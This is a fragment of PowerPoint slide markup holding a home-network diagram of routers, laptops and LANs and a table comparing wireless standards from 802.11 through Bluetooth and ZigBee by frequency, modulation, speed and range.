                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5F5D149-B2B4-42EF-9F52-B41C7E1FDD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93498" y="4354776"/>
                <a:ext cx="389485" cy="322211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47" name="Picture 28" descr="E:\Web2.0 PNG Icons\Laptop1.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D571345-8CD2-4DF6-B0D4-F0E01627A3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43566" y="5628915"/>
                <a:ext cx="395335" cy="31626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48" name="Picture 32" descr="E:\haja Premium\Wireless_Signal.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70FF7DBA-47DD-4CEB-B9A5-D78FF5230E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5400000">
                <a:off x="4583931" y="4904795"/>
                <a:ext cx="527472" cy="5274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49" name="Picture 8" descr="E:\Icon Shock\CLEAN\Networking\router_256.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F9B3285-61AE-4193-898B-324D32182C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66804" y="4773581"/>
                <a:ext cx="776950" cy="7769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50" name="Picture 32" descr="E:\haja Premium\Wireless_Signal.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54A3E30E-49B2-4870-9873-5BD8388968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6200000">
                <a:off x="5776359" y="4918868"/>
                <a:ext cx="527472" cy="5274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51" name="Picture 8" descr="E:\Icon Shock\CLEAN\Networking\router_256.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E440F8-4D84-4CD5-8A7A-86E2BB13F4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21232" y="4787654"/>
                <a:ext cx="776950" cy="7769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52" name="Picture 33" descr="E:\Icon Shock\CLEAN\Networking\commutator_256.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF5E33FE-8C53-4AA4-9A85-05320957E5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26331" y="4253016"/>
                <a:ext cx="482425" cy="48242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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="453" name="Elbow Connector 137">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053D728E-1222-422E-991F-7AE3312B6C00}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipV="1">
                <a:off x="4116054" y="4692289"/>
                <a:ext cx="457200" cy="118872"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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4" name="Elbow Connector 138">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EC26CCD-832C-4339-9767-F0728CA8E5FD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="4430187" y="4694347"/>
                <a:ext cx="457200" cy="118872"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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5" name="Elbow Connector 139">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F845AEB-0DCB-4B01-9ADA-F9ED395A04D9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="4116179" y="5455913"/>
                <a:ext cx="457200" cy="118872"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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6" name="Elbow Connector 140">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC2140E-739B-4D5B-8866-2E501408F570}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="4430312" y="5457971"/>
                <a:ext cx="457200" cy="118872"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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Elbow Connector 142">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C70947A3-A993-487E-8B03-75DA5BACDBA7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipV="1">
                <a:off x="6054977" y="4694347"/>
                <a:ext cx="457200" cy="118872"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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8" name="Elbow Connector 143">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD89C69-B17E-4E54-942B-9FED46A86668}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="6369110" y="4696405"/>
                <a:ext cx="457200" cy="118872"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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Elbow Connector 144">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5319F7A-2866-4C0A-BE33-1B083F561254}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000">
                <a:off x="6055102" y="5457971"/>
                <a:ext cx="457200" cy="118872"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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Elbow Connector 145">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{839C4851-F3CD-4BE8-BB43-14584C813B9F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="6369235" y="5460029"/>
                <a:ext cx="457200" cy="118872"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:prstDash val="sysDot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1" name="Rectangle 460">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B82E2F-54BC-4739-AEBF-AAF499E73A80}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6708019" y="5001839"/>
                <a:ext cx="677360" cy="33855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Broadband Router</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="462" name="Rectangle 461">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85155E77-D6D9-4057-B0AB-81F7DBF4166A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3496787" y="5008017"/>
                <a:ext cx="677360" cy="33855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Broadband Router</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="463" name="Rectangle 462">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9261080B-1D72-4A04-BBB5-B5D3AB1C4F24}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4116599" y="4163639"/>
                <a:ext cx="677360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LAN 1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="464" name="Rectangle 463">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D49CF07-67B3-4FE9-8F8F-41DC49CE35CF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6102184" y="4163639"/>
                <a:ext cx="677360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LAN 2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="465" name="Rectangle 464">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F659AF4E-6FC0-41B9-A300-67FD1391B105}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5373390" y="4164160"/>
                <a:ext cx="153074" cy="1908588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pic>
            <p:nvPicPr>
              <p:cNvPr id="466" name="Picture 465">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7688A6-7C92-4D81-BFD6-C62A3D8061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609804" y="4203774"/>
                <a:ext cx="326723" cy="469467"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="467" name="Group 466">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E2D6FD3-2B63-4B6D-8FF2-3FFF64001C02}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6608019" y="4248607"/>
                <a:ext cx="664100" cy="480169"/>
                <a:chOff x="-607016" y="2753502"/>
                <a:chExt cx="664100" cy="480169"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="481" name="Picture 480">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{334F51FF-D7E3-44ED-827E-0026CFA1EFE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607016" y="2817416"/>
                  <a:ext cx="461559" cy="416255"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="482" name="Picture 481">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF1B6CFB-9324-42C8-9486-8C4A51CA59C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34273" y="2753502"/>
                  <a:ext cx="291357" cy="472723"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="468" name="Group 467">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92BE000F-78A3-4CD1-A659-CAA1C835AA17}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4790315" y="4194080"/>
                <a:ext cx="531537" cy="440425"/>
                <a:chOff x="-517427" y="3450833"/>
                <a:chExt cx="643160" cy="532914"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="479" name="Picture 478">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9B4A449-187A-4C5B-9789-CFE2D199EC0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241095" y="3450833"/>
                  <a:ext cx="366828" cy="521283"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="480" name="Picture 479">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD63F45E-16C2-4A55-998C-61DAEDDC80B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517427" y="3549940"/>
                  <a:ext cx="330945" cy="433807"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="469" name="Group 468">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84A26C0A-FA5B-4C80-A10F-4DFD2936C811}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6672841" y="5451383"/>
                <a:ext cx="577247" cy="524573"/>
                <a:chOff x="6655423" y="5451383"/>
                <a:chExt cx="577247" cy="524573"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="477" name="Picture 476">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52962FF9-CCE6-4482-B264-55CE5F82EE0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655423" y="5451383"/>
                  <a:ext cx="274105" cy="479684"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="478" name="Picture 477">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90AC44A6-ECA9-4538-9F9B-857F06D4595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868622" y="5480479"/>
                  <a:ext cx="364048" cy="495477"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="470" name="Group 469">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{685E0028-760D-4FD4-89B5-155A3498830A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5651869" y="5490997"/>
                <a:ext cx="633904" cy="466874"/>
                <a:chOff x="5634451" y="5490997"/>
                <a:chExt cx="633904" cy="466874"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="475" name="Picture 474">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62E4EBFC-F08C-4AD1-B060-E91D82D7D6B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832279" y="5650732"/>
                  <a:ext cx="436076" cy="280335"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="476" name="Picture 475">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BA5A85-1585-4606-ABCF-2A27518C4FB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634451" y="5490997"/>
                  <a:ext cx="317100" cy="466874"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="471" name="Picture 470" descr="A close up of a screen&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5878C6-327A-449C-AA8C-94F5E02B02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679665" y="5663686"/>
                <a:ext cx="497500" cy="310938"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="472" name="Picture 471">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92A91610-ECA0-493C-BE77-8D0D9DEEEC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016960" y="5564164"/>
                <a:ext cx="304615" cy="430329"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="473" name="Picture 472">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B354BE51-0C8B-4114-AC37-7750D2E0A3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720942" y="5526557"/>
                <a:ext cx="334013" cy="472298"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="474" name="Picture 473">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{380C0A84-FD38-4574-943B-7344E16558C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605577" y="4246650"/>
                <a:ext cx="302680" cy="426460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238121479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E3BA1FC9-ABA4-43CE-A1A8-BB12C09565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6854593"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="1135139"/>
          <a:ext cx="11582400" cy="5227500"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{10A1B5D5-9B99-4C35-A422-299274C87663}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="266150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93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615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077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46222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11470"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Amendments</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="16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Arial Black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kern="12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Frequency (GHz)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="12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kern="12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</a:rPr>
                        <a:t>Modulation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="16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Arial Black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Speed (Mbps)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="16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Arial Black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Range (Meters)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="160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Arial Black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1423">
                <a:tc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802.11 (Wi-Fi)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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500" dirty="0"/>
                        <a:t>2.4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500" dirty="0"/>
                        <a:t>DSSS, FHSS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500" dirty="0"/>
                        <a:t>1, 2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20 – 100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5885391"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="294886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500" kern="1200" dirty="0"/>
                        <a:t>802.11a</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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5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OFDM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6, 9, 12, 18, 24, 36, 48, 54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500" dirty="0"/>
                        <a:t>35 – 100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8953432"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="294886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3.7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500" dirty="0"/>
                        <a:t>5000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2605460"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
                        <a:t>802.11b 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2.4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DSSS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1, 2, 5.5, 11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35 – 140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8278148"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="555926">
                <a:tc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802.11d</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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500" dirty="0"/>
                        <a:t>It is an enhancement to 802.11a and 802.11b that enables global portability by </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>allowing variations in frequencies, power levels, and bandwidth</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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IN" sz="145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en-US" sz="1450" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill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en-US" sz="1450" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1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928422583"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="37142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500" dirty="0"/>
                        <a:t>802.11e</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" dirty="0"/>
                        <a:t>It provides guidance for prioritization of data, voice, and video transmissions </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>enabling QoS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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IN" sz="145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en-US" sz="1450" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill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en-US" sz="1450" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1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316436716"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
                        <a:t>802.11g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2.4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OFDM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6, 9, 12, 18, 24, 36, 48, 54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500" dirty="0"/>
                        <a:t>38 – 140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46748621"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="497407">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
                        <a:t>802.11i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l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
                        <a:t>A standard for wireless local area networks (WLANs) that provides improved encryption for networks that use 802.11a, 802.11b, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>802.11g standards; defines WPA2-Enterprise/WPA2-Personal for Wi-Fi</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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65834392"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
                        <a:t>802.11n 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kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2.4,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" baseline="0" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>5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MIMO-OFDM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kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>54 – 600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kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>70 – 250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0676220"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
                        <a:t>802.15.1 (Bluetooth)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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2.4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GFSK, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="el-GR" sz="1500" dirty="0"/>
                        <a:t>π/4-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1500" dirty="0"/>
                        <a:t>DPSK,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1500" baseline="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1500" dirty="0"/>
                        <a:t>8DPSK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kern="1200" dirty="0"/>
                        <a:t>25 – 50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10 – 240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6460085"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
                        <a:t>802.15.4 (ZigBee)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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500" dirty="0"/>
                        <a:t>0.868, 0.915, 2.4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IN" sz="1500" dirty="0"/>
                        <a:t>O-QPSK,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-IN" sz="1500" baseline="0" dirty="0"/>
